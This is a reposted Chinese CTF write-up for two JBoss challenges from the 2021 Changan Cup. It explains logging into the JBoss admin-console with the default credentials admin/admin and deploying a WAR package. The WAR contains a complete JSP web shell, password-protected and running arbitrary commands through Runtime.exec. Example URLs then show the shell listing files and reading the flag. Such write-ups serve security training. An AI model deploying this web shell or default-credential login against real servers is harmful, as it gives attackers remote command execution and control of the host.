当前位置:首页 » 《关注互联网》 » 正文

CTF_Web:长安杯-2021 Old But A Little New & asuka题解_AFCC_的博客(Web_Dog)

29 人参与  2022年01月25日 10:18  分类 : 《关注互联网》  评论

点击全文阅读


0x00 Old But A Little New

两个JBoss题目几乎一模一样,解法也相同,题目只考一个内容,就是Jboss后台上传war包getshell。
首先是一个jboss页面。
后面的wiki等等连接都在jboss的官网,与本题没有关系。

0x01 弱口令登录

第一个路径admin-console,管理员控制台可以直接使用admin、admin的弱口令登录,在后台中找到部署war包的地方上传。(这里的shell.war是已经上传好的)

0x02 上传war包getshell

在这里使用的是TsengYUen师傅的回显jsp一句话,然后使用命令打包。

jar cvf shell.war 1.jsp

一句话的内容为:

<%
   if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

部署成功后查看自己的war包:
路径为/shell/1.asp
网页连接列目录

http://51118620.yunyansec.com/shell/1.jsp?pwd=023&i=ls

直接cat flag即可。

http://51118620.yunyansec.com/shell/1.jsp?pwd=023&i=cat%20flag

0x03 asuka

JBoss系列的题目,与上一个JBoss相同的解法,用同一个war包即可。命令执行获取flag


点击全文阅读


本文链接:http://zhangshiyu.com/post/33852.html

上传  解法  题目  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1